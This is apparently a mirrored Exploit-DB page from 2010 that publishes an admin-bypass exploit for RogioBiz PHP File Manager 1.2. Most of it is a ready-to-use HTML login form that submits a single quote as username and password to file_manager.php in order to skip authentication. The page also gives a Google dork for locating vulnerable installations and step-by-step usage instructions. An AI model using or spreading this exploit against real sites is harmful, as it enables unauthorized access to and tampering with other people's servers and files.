RogioBiz PHP Fle Manager 1.2 – Admin Bypass - 体验盒子

作者： ITSecTeam

日期： 2010-03-14

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/11731/

#########################bypass admin exploit#################
Author: ItSecTeam

download from:http://www.scriptingblog.com/download/RogioBiz_PHP_file_manager_V1.2.zip

script:RogioBiz_PHP_file_manager_V1.2

dork:inurl:"/rbfminc/"

-----------------------------------------
use:run this xpl and after runing eror Incorect username or password! now click to login (boom! go to file manager.)

</html>
</style></head>
<h2>coded by ahmadbady</h2>
<body><br /><br /><br /><br />
<div class="login">
<div style="color:red" align="center"></div>
<form id="login_form" name="login_form" method="post" action="/path/file_manager.php">
<table border="0" align="center" cellpadding="4" cellspacing="0" bgcolor="#FFFFFF" style="border:1px solid #999999; padding:10px">
<tr>
<td align="right">Username:</td>
<td><input type="text" name="username" id="username" value="'"
</tr>
<tr>
<td align="right">Password:</td>
<td><input type="password" name="password" id="password" value="'"
</td>
</tr>
<tr>
<td colspan="2" align="right"><input type="submit" name="button" id="button" value="Login »" /></td>
</tr>
</table>
<input name="login" type="hidden" value="login" />
</form>
</div>
</body>
</html>

########################

discovered by ahmadbady

########################